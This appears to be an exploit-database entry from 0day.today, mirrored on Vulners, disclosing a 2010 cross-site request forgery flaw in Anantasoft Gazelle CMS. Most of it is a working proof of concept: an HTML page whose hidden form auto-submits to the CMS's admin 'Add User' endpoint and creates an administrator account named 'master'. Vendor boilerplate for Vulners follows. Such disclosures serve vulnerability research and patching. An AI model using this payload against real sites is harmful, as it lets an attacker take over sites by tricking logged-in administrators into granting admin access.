Lucene search
K

Anantasoft Gazelle CMS CSRF Vulnerability

🗓️ 10 Mar 2010 00:00:00Reported by Pratul AgrawalType 
zdt
 zdt
🔗 0day.today👁 12 Views

Anantasoft Gazelle CMS CSRF Vulnerability allows attackers to add an admin user through a crafted URL

Code
=========================================
Anantasoft Gazelle CMS CSRF Vulnerability
=========================================

 # Software      Anantasoft_Gazelle_CMS
 
  # Category      CMS / Portals
    
  # Plateform     php
   
    
    
  #  Proof of concept   #
  
  Targeted URL:  http://server/demo/2/193/Anantasoft_Gazelle_CMS
   
  
   Script to Add the Admin user through Cross Site request forgery
    
             .  ................................................................................................................
    
                        <html>
 
                          <body>
 
                             <form name="XYZ" action="http://server/gazelle/admin/index.php?Users/Add%20User" method="post">
 
                                    <input type=hidden name="name" value="master">
 
                                    <input type=hidden name="pass" value="master">
 
                                    <input type=hidden name="controle" value="master">
 
                                    <input type=hidden name="email" value="master%40yahoo.com">
 
                                    <input type=hidden name="active" value="on">
 
                                    <input type=hidden name="showemail" value="on">
 
                                    <input type=hidden name="admin%5B%5D" value="2">
 
                                    <input type=hidden name="save" value="Add">
 
                                    <input type=hidden name="table" value="users">
 
                                    <input type=hidden name="joindate" value="2010-03-10+04%3A04%3A36">
                             </form>
 
                               <script>
 
                                 document.XYZ.submit();
 
                               </script>
 
                          </body>
 
                        </html>
    
             .  ..................................................................................................................
    
    
    
  After execution refresh the page and u can see that user having giving name Added automatically with Admin Privilege.



#  0day.today [2018-01-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation